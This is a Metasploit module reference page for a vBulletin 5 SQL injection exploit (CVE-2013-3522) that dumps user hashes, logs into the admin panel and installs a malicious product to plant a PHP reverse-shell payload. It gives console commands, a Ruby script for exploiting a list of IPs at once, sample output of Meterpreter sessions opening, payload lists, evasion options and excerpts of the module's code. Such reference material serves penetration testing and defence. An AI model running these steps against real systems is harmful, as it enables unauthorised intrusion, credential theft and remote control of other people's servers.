vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection - Metasploit


This page contains detailed information about how to use the exploit/unix/webapp/vbulletin_vote_sqli_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
Module: exploit/unix/webapp/vbulletin_vote_sqli_exec
Source code: modules/exploits/unix/webapp/vbulletin_vote_sqli_exec.rb
Disclosure date: 2013-03-25
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2013-3522

This module exploits a SQL injection vulnerability found in vBulletin 5 that has been used in the wild since March 2013. This module uses the sqli to extract the web application's usernames and hashes. With the retrieved information tries to log into the admin control panel in order to deploy the PHP payload. This module has been tested successfully on VBulletin Version 5.0.0 Beta 13 over an Ubuntu Linux distribution.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using vbulletin_vote_sqli_exec against a single host

Normally, you can use exploit/unix/webapp/vbulletin_vote_sqli_exec this way:

msf > use exploit/unix/webapp/vbulletin_vote_sqli_exec
msf exploit(vbulletin_vote_sqli_exec) > show targets
    ... a list of targets ...
msf exploit(vbulletin_vote_sqli_exec) > set TARGET target-id
msf exploit(vbulletin_vote_sqli_exec) > show options
    ... show and set options ...
msf exploit(vbulletin_vote_sqli_exec) > exploit

Using vbulletin_vote_sqli_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your vbulletin_vote_sqli_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/webapp/vbulletin_vote_sqli_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the unix/webapp/vbulletin_vote_sqli_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/webapp/vbulletin_vote_sqli_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/vbulletin_vote_sqli_exec) > show info

       Name: vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection
     Module: exploit/unix/webapp/vbulletin_vote_sqli_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2013-03-25

Provided by:
  Orestis Kourides
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   vBulletin 5.0.0 Beta 11-28

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  MAXNODE    100              yes       Valid Node ID
  MINNODE    1                yes       Valid Node ID
  NODE                        no        Valid Node ID
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to vBulletin
  VHOST                       no        HTTP server virtual host

Payload information:
  Space: 10000

Description:
  This module exploits a SQL injection vulnerability found in 
  vBulletin 5 that has been used in the wild since March 2013. This 
  module uses the sqli to extract the web application's usernames and 
  hashes. With the retrieved information tries to log into the admin 
  control panel in order to deploy the PHP payload. This module has 
  been tested successfully on VBulletin Version 5.0.0 Beta 13 over an 
  Ubuntu Linux distribution.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2013-3522
  OSVDB (92031)
  https://www.exploit-db.com/exploits/24882
  http://www.securityfocus.com/bid/58754
  http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt

Module Options


This is a complete list of options available in the unix/webapp/vbulletin_vote_sqli_exec exploit:

msf6 exploit(unix/webapp/vbulletin_vote_sqli_exec) > show options

Module options (exploit/unix/webapp/vbulletin_vote_sqli_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   MAXNODE    100              yes       Valid Node ID
   MINNODE    1                yes       Valid Node ID
   NODE                        no        Valid Node ID
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to vBulletin
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   vBulletin 5.0.0 Beta 11-28

Advanced Options


Here is a complete list of advanced options supported by the unix/webapp/vbulletin_vote_sqli_exec exploit:

msf6 exploit(unix/webapp/vbulletin_vote_sqli_exec) > show advanced

Module advanced options (exploit/unix/webapp/vbulletin_vote_sqli_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/webapp/vbulletin_vote_sqli_exec module can exploit:

msf6 exploit(unix/webapp/vbulletin_vote_sqli_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   vBulletin 5.0.0 Beta 11-28

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/webapp/vbulletin_vote_sqli_exec exploit:

msf6 exploit(unix/webapp/vbulletin_vote_sqli_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   18  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the unix/webapp/vbulletin_vote_sqli_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/webapp/vbulletin_vote_sqli_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

MINNODE can't be major than MAXNODE


Here is a relevant code snippet related to the "MINNODE can't be major than MAXNODE" error message:

68:	  def brute_force_node
69:	    min = datastore["MINNODE"]
70:	    max = datastore["MAXNODE"]
71:	
72:	    if min > max
73:	      print_error("MINNODE can't be major than MAXNODE")
74:	      return nil
75:	    end
76:	
77:	    for node_id in min..max
78:	      if exists_node?(node_id)

<PEER> - Error when trying to install the product.


Here is a relevant code snippet related to the "<PEER> - Error when trying to install the product." error message:

284:	    })
285:	
286:	    if res and res.code == 200 and res.body and res.body.to_s =~ /Product #{@product_id} Imported/
287:	      return true
288:	    elsif res
289:	      fail_with(Failure::Unknown, "#{peer} - Error when trying to install the product.")
290:	    else
291:	      return false
292:	    end
293:	
294:	  end

Failed to get the uninstall token, the product <PRODUCT_ID> should be uninstalled manually...


Here is a relevant code snippet related to the "Failed to get the uninstall token, the product <PRODUCT_ID> should be uninstalled manually..." error message:

355:	
356:	  def on_new_session(session)
357:	    print_status("Getting the uninstall token info...")
358:	    delete_token = get_delete_token
359:	    if delete_token.nil?
360:	      print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
361:	      return
362:	    end
363:	
364:	    print_status("Deleting the product #{@product_id}...")
365:	    if delete_product(delete_token)

Failed uninstall the product <PRODUCT_ID>, should be done manually...


Here is a relevant code snippet related to the "Failed uninstall the product <PRODUCT_ID>, should be done manually..." error message:

363:	
364:	    print_status("Deleting the product #{@product_id}...")
365:	    if delete_product(delete_token)
366:	      print_good("Product #{@product_id} deleted")
367:	    else
368:	      print_error("Failed uninstall the product #{@product_id}, should be done manually...")
369:	    end
370:	  end
371:	
372:	  def exploit
373:	    print_status("Checking for a valid node id...")

node id not found


Here is a relevant code snippet related to the "node id not found" error message:

371:	
372:	  def exploit
373:	    print_status("Checking for a valid node id...")
374:	    node_id = get_node
375:	    if node_id.nil?
376:	      print_error("node id not found")
377:	      return
378:	    end
379:	
380:	    print_good("Using node id #{node_id} to exploit sqli... Counting users...")
381:	    data = do_sqli(node_id, "select count(*) from user")

Error exploiting sqli


Here is a relevant code snippet related to the "Error exploiting sqli" error message:

378:	    end
379:	
380:	    print_good("Using node id #{node_id} to exploit sqli... Counting users...")
381:	    data = do_sqli(node_id, "select count(*) from user")
382:	    if data.empty?
383:	      print_error("Error exploiting sqli")
384:	      return
385:	    end
386:	    count_users = data.to_i
387:	    users = []
388:	    print_good("#{count_users} users found")

<PEER> - Failed to log into the vBulletin admin control panel


Here is a relevant code snippet related to the "<PEER> - Failed to log into the vBulletin admin control panel" error message:

422:	        break
423:	      end
424:	    end
425:	
426:	    if @session.blank?
427:	      fail_with(Failure::NoAccess, "#{peer} - Failed to log into the vBulletin admin control panel")
428:	    end
429:	
430:	    print_status("Getting the install product security token...")
431:	    install_token = get_install_token
432:	    if install_token.nil?

<PEER> - Failed to get the install token


Here is a relevant code snippet related to the "<PEER> - Failed to get the install token" error message:

428:	    end
429:	
430:	    print_status("Getting the install product security token...")
431:	    install_token = get_install_token
432:	    if install_token.nil?
433:	      fail_with(Failure::Unknown, "#{peer} - Failed to get the install token")
434:	    end
435:	
436:	    @session_hash = install_token[:session_hash]
437:	    @product_id = rand_text_alpha_lower(5 + rand(8))
438:	    print_status("Installing the malicious product #{@product_id}...")

Failed to get the uninstall token, the product <PRODUCT_ID> should be uninstalled manually...


Here is a relevant code snippet related to the "Failed to get the uninstall token, the product <PRODUCT_ID> should be uninstalled manually..." error message:

447:	    end
448:	
449:	    print_status("Getting the uninstall token info...")
450:	    delete_token = get_delete_token
451:	    if delete_token.nil?
452:	      print_error("Failed to get the uninstall token, the product #{@product_id} should be uninstalled manually...")
453:	      return
454:	    end
455:	
456:	    print_status("Deleting the product #{@product_id}...")
457:	    if delete_product(delete_token)

Failed uninstall the product <PRODUCT_ID>, should be done manually...


Here is a relevant code snippet related to the "Failed uninstall the product <PRODUCT_ID>, should be done manually..." error message:

455:	
456:	    print_status("Deleting the product #{@product_id}...")
457:	    if delete_product(delete_token)
458:	      print_good("Product #{@product_id} deleted")
459:	    else
460:	      print_error("Failed uninstall the product #{@product_id}, should be done manually...")
461:	    end
462:	
463:	  end
464:	
465:	

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Orestis Kourides
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.